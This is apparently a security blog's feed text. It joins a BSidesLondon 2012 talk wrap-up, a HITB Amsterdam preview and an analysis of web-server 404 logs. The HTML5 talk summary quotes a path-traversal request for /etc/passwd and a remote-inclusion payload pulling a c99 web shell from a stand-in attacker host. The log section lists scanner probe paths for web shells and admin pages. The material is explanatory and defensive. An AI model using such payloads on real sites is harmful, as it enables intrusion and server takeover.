Next, the security of Windows Phone 7 was analyzed by David Rook (@securityninja). As other systems, Windows Phone 7 will suffer of security issues. Why? Today, 31% of mobile devices are smartphones. And those devices are really useful when you install apps. Remember the slogan: “There is an app for that!“. And apps introduce vulnerabilities. The market share of Windows Phone 7 is today only 1.9% but it will grow in the coming years. After this introduction, David explained how apps are developed and are running. First, if you are a .Net developer, you are already a Windows Phone 7 develop! .Net is also used but in a compact framework for resource constrained devices. The applications run in a “CLR” (“Common Language Runtime” – some kind of Java VM) and cannot access restricted code. The security model is the following:

• Chambers concept to enforce app isolation and least privilege
• The chambers provide a security boundary to restrict the apps
• For chambers and apps runs in one of them
• 3 chambers have fixed permission sets
• 4th chamber is capabilities based

An interesting tool: Windows Phone App Analyzer 1.0

Note that all apps must be signed by Microsoft after reviewing process before being published on the Microsoft market. For the rest, the same features are used: application sandboxing, isolated storage. Security remains the same but think more about the root causes like input/output validation, error handling, etc. Robin’s Top-3 is: secure storage, authentication & access and privacy. Nothing really new, the same best practices must be implemented: Never store data locally if not needed. About encryption, Windows Phone 7 allows to encrypt data & databases, do it!

SecurityNinja & Windows Phone 7

The next talk was not schedule (planning change?) but it was really interesting. Paco Hope talked about “randomness”. Where are random numbers used? In many fields: games (poker), gambling, lottery, casino but also in more “technical application” like SSL, filename generators etc. What’s important with randomness?

• The uniformity (no pattern)
• The forward security (can’t know previous values)
• The backward security (can’t know future values)

Developing a good random generator is not easy (as seen on xkcd.com). Plenty of mistakes can be done making the generator predictable (even if sometimes it’s not easy at all). Random numbers can be generated by hardware solutions (PCI cards, built-in chips on motherboards or USB dongle) but they also have vulnerabilities: environmental (temperature, voltage). And the throughput remains critical in some applications. About software solutions, common problems are where to gt the entropy, how often reseed occur, the period and seed size. Vulnerabilities are a disclosed seed or attacking the entropy sources. Some example of bad implementation: using the system time or a process ID. Paco showed examples of algorithm to shuffle cards. Very interesting!

Paco Hope about Randomness

Let’s continue with a good talk about HTML5 by Robert McArdle (@robmcardle). The next version of the HTML is more and more used and tested by web developers. It will introduce cool features but cool features sometimes say… security issues! The talk was divided in three parts: the good, the bad and the “???”

What’s cool with HTML5?

• HTML5 Canvas – 2D & 3D easy to make nice graphics and add more interaction with users. A good example is Quake2 demo in HTML5
• Embedding videos in pages is very easy as wall as the interaction with the users (pause, CSS)
• Geolocalisation (mainly on mobile devices) is possible in a few lines of codes
• Drag & Drop!
• Web notifications

But what’s bad?

• XSS attackes remain valid with new tags (“<video>”)
• XMLHTTPRequest() extends the local file inclusing problem! Instead of “http://site.com&page=../../../../etc/passwd“, we could see “page=http://www.evilsite.com/c99shell.php“
• Based on JavaScript, obfuscation is easy and not detected by AV’s)
• Web notification coupled with social engineering could be evil! (pop-ups looking like the operating system ones)

Finally, the ???: A nice demo of a BitB (“BotNets in the Browser“) attack. Based on HTML5 code, it’s possible to perform DDoS attacks, to send spam, to geolocate the victim, grab information about his system. Awesome (depending on the point of view). Keep an eye on HTML5! For sure, it will become a nice platform to conduct attacks. Have a look at html5security.org for updates on this topic.

HTML5 Attacks

After the lunch, another talk about social engineering by Gavin Ewan (@jac0byterebel). “A salesman’s guide to social engineering” was really complimentary to the first one presented in the morning. The Gavin’s definition of social engineering is: “Hacking the human mind, bypassing the human IDS”. How? There are several channels: Face 2 face, telephone or online . Then Gavin focused on a comparison between a salesman and a social engineer. If you look close to their methods, they are very close to each other! Both recognize that each target (sale/attack) is different, they can play different roles, they use a variety of questioning techniques and recognize that “no” does not mean “no”. A really nice talk given with a Scottish humor! Great.

Gavin Ewan about Social Engineering

Then, the security of SCADA environments was reviewed by Amol Sarwate (@amolsarwate). After a review of the components used in a SCADA environment (I/O – remote – communication – master), Amol reviewed the threats that affect each components. Two protocols used in SCADA environment were reviewed: Modbus and DNP 3.0 (over TCP).  (Did you know that Wireshark was able to decode them?). The main issues with those protocols: they don’t follow the CIA principle (no authentication, no encryption). What are common issues within SCADA environments?

• HMI (Human Machine Interfaces) are sometimes connected on corporate network or Internet
• Shared or simple passwords are used (what’s new in this world?)
• No patching policy and Windows systems
• Not restarted for years (will it boot again?)
• System long life cycle (often they are installed for a decade)
• Outdated techs
• SCADA administrators are not system administrators.

Note that no only SCADA systems (in industrial environments) are to blame but also medical systems (ex: imagery systems in hospitals). More precisely, it’s not the systems themselves (after all they do the job they have been developed for) to blame but more the way they are deployed and managed. To close the presentation, Amol presented the tool developed by Qualys: scandascan.pl (The first release if available here). It scans networks for SCADA devices responding to Modbus or DNP3. If you are looking for online (publicly available) SCADA devices, Shodan can be also a great tool.

Security of SCADA Environments

My last choice was the presentation of Abraham Aranguren(@7a_) about his tool called “owtf” which stands for “Offensive Web Testing Framework“. After a short introduction why and how web app testing is important, Abraham explained his tool with multiple demos. Testing web applications is important. Did you know that 32 out of 66 OWASp tests can be performed legally (depending on the local laws – take care!). Abraham’s tool is available here. Unfortunately, I was not able to attend the end of his presentation as well as the last track due to travel constraints.

What else? In parallel to the two tracks, there was a third one left open for last-minute initiatives (with 15 minutes slots). I attended some of them which where interesting. Security researchers are doing a great job. As said Robin during his talk: security conferences and networking is a key point, so I did. This second edition of BSidesLondon was a great opportunity to meet new (and old) friends. Thanks to my new followers in Twitter. I think that London was never so full of infosec people! Kudos to the crew (especially to @geekchickuk!) and see you in 2013! May I already book my ticket?

It's Over!

 

• Turning Android inside-out (forensics)
• One flew over the cuckoos nest (automatic malware analysis)
• Whistling over the wire (Twitter & URL shorteners security)
• Security threads in the world of digital satellite television (set-top-boxes security)
• PostScript – danger ahead
• Automatically searching for vulnerabilities (taint analysis)
• Bypassing the Android permission model (mobile security)
• Attacking XML processing
• Smashing VMDK files for fun and profit (virtualization)

The CFT contest is also back but in a new format called “Bank0verflow“.  Based on both attack and defense modules, it will see teams of three provided with a set of custom vulnerable services and web applications. Teams need to exploit their rivals’ machines to retrieve pre configured flags to score offensive points and obtain defensive points by keeping their own vulnerable services running. Another new “event in the event“: The Hackaton will be organized for the first time in Amsterdam. The principle is simple: put hackers in a room and let them write some code during 12 hours. The topic of this edition is the implementation of a proof of concept to problems related to browsers and their extensions. First price will be: 1337 EUR in cash!

A few words about the talks, the proposed topics are not only focusing on classic computers but also other electronic devices that we use daily. Adam Gowdiak will present his researches about  security flaws in digital satellite TV set-top-boxes and DVB chipsets used by many satellite TV providers worldwide. The hackers (aka “iOS Jailbreak Dream Team”) who released the jailbreak of Apple’s popular iPhone 4S and iPad 2 devices will also be there to present their research.

Finally, SIGINT sessions (15-30 minutes max) will be organized during coffee & lunch breaks to let other people to present their project or researches. During one of those sessions, I’ll present my tool pastemon and the associated blog leakedin.com. This will be my (very small) contribution to this event.

I’ll attend the conference and write a wrap-up. Feel free to ping me if you want to meet…

]]> http://blog.rootshell.be/2012/04/20/some-news-about-hitb-amsterdam/feed/ 0 http://blog.rootshell.be/2012/04/16/the-value-of-http-404-errors/ http://blog.rootshell.be/2012/04/16/the-value-of-http-404-errors/#comments Mon, 16 Apr 2012 17:32:46 +0000 Xavier http://blog.rootshell.be/?p=9459 The HTTP protocol has a list of response status codes to help communication between the server and the browser. Everytime a server responds to a browser request, a status code is sent. The most common ones are: “200” which means “Everything is ok, here is some food!” and “404” which means “Not found“. The second error may be caused by the client (example: an error in the URL typed in the browser) or by the developer/administrator who forgot to copy files or also made typo errors in his code. That’s why the amount of 404 errors is directly related to the type of environment. During development and test phases, it’s common to have more errors. On the other side, in a production environment, the amount of 404 errors should be limited and the main source of errors will be the client/browser.

Sometimes, “404” errors are considered useless by webmasters and are simply ignored in their reports. After all, their goal is to know how many visitors browsed to their websites. From a security perspective, those errors could be very helpful to detect unusual traffic targeting a web sites.

I analyzed one year of my blog logs (yes, I’ve a long retention policy!). Some facts to start:

• Total hits: 9.534.062
• 404 errors: 343.606 (3.6%)

As you can see on the graph below, the 404 error code comes in the fifth position after the classic 200 and 3xx codes.

(Click to enlarge)

As I’m trying to keep the blog clean, this huge amount of “not found” errors looked strange to me. I decided to generate more statistics. What can we deduct? For a while, the big winner is the TimThumb vulnerability discovered in Augustus 2011. The exploit was released the 3rd of Augustus and the first attempt hit me on the 4th! Still today, I received plenty of probes (see this month):

(Click to enlarge)

The TimThumb scans are coming from three main sources as see on the Google map below (the live map is available here).

(Click to enlarge)

 Another trend this month: more and more .rar archive files are tested. Especially this month. Why? I’ve absolutely no idea! If you have ideas, feel free to post your comments!

(Click to enlarge)

The top-10 of requested .rar files is:

• /mirserver.rar
• /web.rar
• /www.rar
• /mirserver1.rar
• /wwwroot.rar
• /youxi.rar
• /mh.rar
• /manhua.rar
• /mirserver2.rar
• /mirserver3.rar

Some of them look like performed by scanners which are looking for websites backups. But I did not see the same amount of requests for .tar.gz or .zip files! (Except for “www.zip“) I also saw request for files based on numbers: 5555.rar, 8888.rar, 444.rar, etc. Based on Google, those file are massively infected with malwares but why look for them on my server?

Finally, scanners are looking for .asp (Microsoft .Net) pages. Especially for the last two months:

(Click to enlarge)

The top-10 of requested .asp pages is:

• /save.asp
• /plug/save.asp
• /gmsave.asp
• /diy.asp
• /shell.asp
• /dama.asp
• /upfile_flash.asp
• /FCKeditor/editor/filemanager/connectors/asp/connector.asp
• /xiaoma.asp
• /up_BookPicPro.asp

And what about common tools or web interfaces? The top-10 is:

• /setup.php
• /scripts/setup.php
• /admin
• /login.php
• /phpmyadmin/
• /myadmin/
• /mysql/
• /db/
• /administrator/
• /db/

As you can see, there is plenty of useful information in your Apache (or any other webserver) log files! Keep an eye on your 404 errors to discover new trends! A temporary peak of 404 errors could mean that your server is under an attack…